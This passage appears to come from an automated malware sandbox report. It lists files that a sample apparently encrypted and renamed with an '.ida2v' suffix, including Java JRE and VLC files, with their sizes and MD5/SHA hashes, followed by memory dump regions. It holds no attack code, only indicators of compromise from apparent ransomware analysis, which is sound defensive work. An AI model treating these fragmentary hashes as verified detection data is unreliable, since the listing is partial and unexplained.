768317a9fb9856332a2776755eb9fd61

SHA1
3230c6b40a9863dcbe9175b825e458cd95a3287c

SHA256
8bb99fbebc106845bde473a7068e4d9cfa983eb8274109ffb25fc85523c0fc16

SHA512
aa2008eb4466157823497462b9476986d443db970f611e34abcf98b5aa598d9343f5f9de66a0ba46e3a3b6755e960ed9d5722794429c29e6494e2918be9e17d2

Download Submit
C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyNoDrop32x32.gif.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v

Filesize
153B

MD5
1e9d8f133a442da6b0c74d49bc84a341

SHA1
259edc45b4569427e8319895a444f4295d54348f

SHA256
1a1d3079d49583837662b84e11d8c0870698511d9110e710eb8e7eb20df7ae3b

SHA512
63d6f70c8cab9735f0f857f5bf99e319f6ae98238dc7829dd706b7d6855c70be206e32e3e55df884402483cf8bebad00d139283af5c0b85dc1c5bf8f253acd37

Download Submit
C:\Program Files\Java\jre7\lib\zi\Etc\GMT+5.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v

Filesize
27B

MD5
a2abe32f03e019dbd5c21e71cc0f0db9

SHA1
25b042eb931fff4e815adcc2ddce3636debf0ae1

SHA256
27ba8b5814833b1e8e8b5d08246b383cb8a5fb7e74e237cdbcadf320e882ab78

SHA512
197c065b9c17c6849a15f45ac69dafa68aaa0b792219fedb153d146f23997bfa4fbc4127b1d030a92a4d7103bded76a1389df715b9539ea23ea21e6a4bb65fb2

Download Submit
C:\Program Files\Java\jre7\lib\zi\Etc\GMT.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v

Filesize
27B

MD5
7da9aa0de33b521b3399a4ffd4078bdb

SHA1
f188a712f77103d544d4acf91d13dbc664c67034

SHA256
0a526439ed04845ce94f7e9ae55c689ad01e1493f3b30c5c2b434a31fa33a43d

SHA512
9d2170571a58aed23f29fc465c2b14db3511e88907e017c010d452ecdf7a77299020d71f8b621a86e94dd2774a5418612d381e39335f92e287a4f451ee90cfb6

Download Submit
C:\Program Files\Java\jre7\lib\zi\HST.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v

Filesize
27B

MD5
715dc3fcec7a4b845347b628caf46c84

SHA1
1b194cdd0a0dc5560680c33f19fc2e7c09523cd1

SHA256
3144bc5353ebbd941cdccbbd9f5fb5a06f38abf5cc7b672111705c9778412d08

SHA512
72ab4b4ad0990cce0723a882652bf4f37aac09b32a8dd33b56b1fbf25ac56ae054328909efd68c8243e54e449d845fb9d53dd95f47eaaf5873762fcd55a39662

Download Submit
C:\Program Files\Java\jre7\lib\zi\MST.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v

Filesize
27B

MD5
11f8e73ad57571383afa5eaf6bc0456a

SHA1
65a736dddd8e9a3f1dd6fbe999b188910b5f7931

SHA256
0e6a7f1ab731ae6840eacc36b37cbe3277a991720a7c779e116ab488e0eeed4e

SHA512
578665a0897a2c05eda59fb6828f4a9f440fc784059a5f97c8484f164a5fcec95274159c6ff6336f4863b942129cb884110d14c9bd507a2d12d83a4e17f596d2

Download Submit
C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v

Filesize
614KB

MD5
65f6cdc151f7795afbba6818dfb2a1d2

SHA1
2db556954a95d05b27cb4370d93fcbfa12bd71d3

SHA256
01fa80cece158542e63abab86fd18bc28a56c348f077f57580d5a342f6d19193

SHA512
fcc5d59716aa37fbcab5f751df58ee63987d737750876d567fd6ccbf1fd0d913e4b5d30cf6b7a77e0aa26f7d9282202138f9faab9a13260cfe1edd2664d3503e

Download Submit
C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v

Filesize
610KB

MD5
8707d487b8c5efa1fdbb5300c1a3f1bc

SHA1
f8f98d852551068bdb063c42472152e3ce2810bd

SHA256
1f2dcd1ef89a4add0d7da3ddc050ca861270567200a2ec041acbf2abca5ef456

SHA512
513543925404c0793665b1491ac9b9a8ae120020652093e0a3dc858d1fc360b5854fafcbbce6bdfb2ce4beb051e30e3872ab0b3a5875c48a5464b9a9ab0fee07

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
6909b9b2c0e0c62e265ed9228fdf71b2

SHA1
4064b938e2a36f717d138a4a2e72273570c47768

SHA256
a7ef931b8ec8313ef8f73ff4ed3cd8de7d6853d284ee75e73fe53efc921b69b6

SHA512
03be1f22bf6840e97e9309d105317b12a4bca9646db6de886ffe378eb29bbe99ef2d5895326e592cf47a9e6dae92a9fe20e1bec4ff4412881c27be4e8832629e

Download Submit
memory/2216-7-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/2216-8-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/2908-15-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2908-14-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download